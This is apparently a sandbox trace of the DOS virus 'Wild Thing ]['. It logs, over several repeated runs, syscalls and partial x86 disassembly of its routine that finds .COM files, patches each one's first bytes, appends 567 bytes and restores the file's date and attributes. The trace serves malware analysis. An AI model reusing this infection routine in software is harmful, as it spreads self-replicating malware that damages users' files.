2018-12-25T12:42:09.323630639Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.324926433Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.328948852Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.330766521Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.33902692Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.341231113Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.35068315Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.360261558Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.364506054Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.370252341Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.380033472Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.392646132Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.394314453Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.400780369Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.403048416Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.405997869Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.40788757Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.417230312Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.418877427Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.426457827Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.437047867Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.43974232Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.445242415Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.455692346Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.463311978Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.464671624Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.471901156Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.47357281Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.476527278Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.478958473Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.488340677Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.489940159Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.498952188Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.508800054Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.511460827Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.519364269Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.539685864Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.546111424Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.547339868Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.553956601Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.555214213Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.557677771Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.559618662Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.56904113Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.570548085Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.578744407Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.59072295Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.593256448Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.599575449Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.609167623Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.615558743Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.617599979Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.624386186Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.625775707Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.633032925Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.644838264Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.647000642Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:09.65669107Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:09.658364813Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:09.659374385Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:09.669618698Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:09.179695499Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:09.181214078Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:09.183235173Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:09.185946195Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:09.188501035Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:09.194170053Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:09.199715347Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:09.205693464Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:09.223306353Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:09.234693641Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:09.236265222Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:09.242554373Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:09.243765812Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:09.24618505Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.248549192Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:09.256470916Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:09.257682331Z 62 PC: 12bfc | Close file
2018-12-25T12:42:09.26572995Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:09.275292893Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.277799179Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.283783857Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.293732591Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.301204354Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.30416836Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.310684945Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.312277012Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.316377165Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.31833487Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.33228408Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.334378623Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.350923974Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.361190564Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.365198466Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.371526131Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.381045184Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.387839579Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.389225071Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.395422553Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.396702474Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.399612048Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.401131288Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.409172997Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.411305432Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.419079733Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.428903679Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.432778707Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.439612023Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.449246617Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.456348745Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.457704827Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.463907921Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.465792709Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.468403942Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.470016617Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.478927076Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.480546566Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.488316503Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.498624615Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.501908289Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.50740326Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.517920036Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.524420542Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.525767229Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.533662213Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.535409746Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.538419882Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.541118943Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.549687444Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.551474865Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.559332272Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.570307334Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.573146208Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.579240717Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.589388079Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.596210063Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.597884653Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.605149225Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.606437717Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.609000483Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.611702016Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.620255747Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.621682998Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.629913178Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.642936116Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.645669079Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.65237463Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.661727049Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.669418092Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.671876646Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.678540404Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.680313925Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.683959572Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.685891335Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.694223316Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.696734499Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.704935958Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.714895817Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.718533953Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.724513089Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.734329012Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.741323623Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.743893914Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.750422196Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.75222011Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.76255853Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.775115118Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.777775149Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:09.782868331Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:09.784643904Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:09.785692167Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:09.794957792Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:09.579225979Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:09.58122187Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:09.583378437Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:09.586171583Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:09.599738497Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:09.605792288Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:09.616593545Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:09.628112259Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:09.643612251Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:09.650367808Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:09.652785783Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:09.659333047Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:09.660960141Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:09.66407714Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.665948531Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:09.674303479Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:09.675940748Z 62 PC: 12bfc | Close file
2018-12-25T12:42:09.684158299Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:09.694044049Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.696911052Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.709041255Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.718771398Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.725441418Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.72777301Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.734321922Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.735963286Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.739666712Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.742276148Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.750982703Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.753208504Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.760945555Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.770654753Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.775851155Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.781349724Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.790883725Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.797726009Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.799270984Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.80548602Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.806935083Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.810054622Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.811728215Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.819849717Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.822207707Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.829984875Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.840774549Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.84456011Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.850046769Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.859570186Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.867723678Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.874929628Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.88143939Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.883667906Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.886162452Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.887558513Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.896190573Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.89765728Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.905103394Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.915592768Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.918114378Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.923561117Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.933751572Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.940108007Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.941410698Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.948278424Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.94990071Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.952326534Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.953973061Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.962363719Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.963918019Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.971971248Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.984984695Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.987451081Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.992873473Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.00326211Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.009910425Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.011270777Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.018417611Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.019741574Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.022246394Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.025202919Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.034113501Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.035834215Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.044443151Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.054420138Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.056908043Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.063119964Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.072784746Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.077405074Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.079064496Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.083066158Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.084371427Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.086727048Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.087941044Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.106609262Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.109133097Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.117185234Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.126960871Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.129888264Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.135899517Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.14563472Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.152617566Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.155216592Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.161745155Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.163489351Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.174694867Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.184340113Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.186601705Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:10.191489022Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:10.193465646Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:10.194777385Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:10.203480749Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:10.377206753Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:10.379205754Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:10.382641423Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:10.38627404Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:10.396115441Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:10.404330454Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:10.411032574Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:10.417470537Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:10.443924097Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:10.471103868Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:10.473217661Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:10.482464685Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:10.484334428Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:10.487685915Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.489977171Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:10.500305968Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:10.502263434Z 62 PC: 12bfc | Close file
2018-12-25T12:42:10.510976555Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:10.523630846Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.534058859Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.551402819Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.564017227Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.571970731Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.574767443Z 63 PC: 12bad | Read file or device (See above)
